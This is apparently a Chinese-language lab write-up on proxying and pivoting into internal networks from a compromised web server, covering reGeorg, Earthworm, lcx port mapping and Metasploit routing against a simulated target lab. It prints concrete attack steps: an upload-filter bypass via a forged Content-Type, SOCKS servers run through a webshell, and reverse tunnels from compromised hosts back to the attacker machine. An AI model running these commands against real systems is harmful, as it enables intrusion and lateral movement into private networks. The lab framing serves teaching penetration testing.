内网代理那些事

有时候,经常在穿梭在行行种种的内网环境中,选择一个合适的代理方式十分重要,网上各式各样的代理工具和脚本也很多,本次实验环境尽可能的模拟真实的网络环境。本次实验分为两种情况:1.一种是被入侵的机器,能够反问道攻击机器(模拟现实中,肉鸡可以反弹的情况)。2:另外一种是被入侵的机器无法访问任何外网,只是被一个外网ip出口单纯的映射了一个端口出来。(可以想象一台公网vps机器映射了无数台web虚拟机) ## 实验环境(情况一) ### 攻击机器 kali一台 (10.211.55.3) ### 靶机

O s Service Ip WeakPoint
ubuntu php,apache 172.17.0.2 upload
centos discuz 172.17.0.4 weak password
debian tomcat 172.17.0.3 s2-032

其中第一个服务映射出一个外网端口80,简而言之就是,现在攻击机可以访问http://10.211.55.6/upfile.php ,这是唯一一个可以被kali访问的服务。

上传导致的问题,直接伪造下Content-Type: image/jpeg就可以上传了。

首先利用reGeorg不成功,很明显由于权限和一些php阉割的原因,socket代理不上。通过自己写的webshell方式代理的话,也只能做一些简单的http协议的事情,很显然不符合我们的需求。 ###Earthworm 下载地址 好像长城宽带就下不了,如果下不了的话,请自行翻墙。这里肯定是正向代理的方式。 在webshell上执行 /ew -s ssocksd -l 2333 然后攻击机proxychains 应用就行了,记得在/etc/proxychains.conf后面加上socket5 10.211.55.6 2333,反正我测试失败了。 ### reGeorg reGeorg使用也很简单,上传一个 然后本机 调用nmap扫描 nmap -sT -Pn -A -sI 192.168.1.101 192.168.1.108 只支持tcp和dns协议

攻击机 proxychains wget http://172.17.0.4/index.php 进一步拓展,reGeorg很方便,基本可以满足我们绝大部分的需求,可是我想充分利用好kali 的msf来渗透怎么办,这时候又无法反弹。 ### MSF 正向代理 先生成一个后门

通过菜刀上传到根目录,然后执行一下 很显然一个shell是无法满足我们的要求的,我们要把shell提升到meterpreter sessions -u 5 查看ip 或者也可以 run get_local_subnets 添加路由 route add 172.17.0.2 255.255.0.0 7 查看下路由 route print 内网扫描搞起,2333 扫存活ip auxiliary/scanner/ip/ipidseq 扫端口 use auxiliary/scanner/portscan/tcp 这里很容易就挂掉 后面就是类似的操作,可以参考文章 科普:msf内网渗透实例

开一个sock4代理 先添加路由在用socks4a模块,不过这玩意用着贼卡 use auxiliary/server/socks4a 查看jobs jobs ### 总结 如果遇到这种流量只进不出的情况,也就是常说的正向代理,那么可以推荐用reGeorg+ proxychains的方式来加载网页或者运行一些python攻击脚本,然后用msf来对内网进行扫描或者域渗透 ## 实验环境(情况二) ### 攻击机器 kali一台 (10.211.55.3) ### 靶机

O s Service Ip WeakPoint
ubuntu php,apache 172.17.0.2 upload
centos discuz 172.17.0.4 weak password
debian tomcat 172.17.0.3 s2-032

情况二简而言之就是可以反弹出shell,可以理解成172.17.0.2这台机器可以访问我们攻击机(10.211.55.3) 这个情况就要好很多了,可以用的方法很多. Earthworm,lcx,ssok ### lcx 先找到一台公网ip,说白了就是172.17.0.2可以ping通的机器,这里我们的攻击机是可以被肉鸡ping通的。 kali上 肉鸡上 /portmap -m 3 -h1 10.211.55.3 -p1 3349 -h2 172.17.0.4 -p2 80 我们再访问http://10.211.55.3:3348/forum.php 发现其实就是把172.17.0.4的discuz给映射到攻击的3348端口上来了。

Earthworm

由于Earthworm包含lcx的用法,也可以直接用它来转发 现在kali(10.211.55.3)机器上监听转发 /ew_for_linux64 -s lcx_listen -l 1234 -e 8888 肉鸡上运行 ./ew -s lcx_slave -d 10.211.55.3 -e 1234 -f 172.17.0.3 -g 8080 是一个struts漏洞

MSF

反向代理 先生成一个反弹后门

msf设置一下 反弹成功

拓展学习

Shell反弹不出来怎么办呢? tunna 正向代理实现转发 内网渗透中转发工具总结 - TwoEyes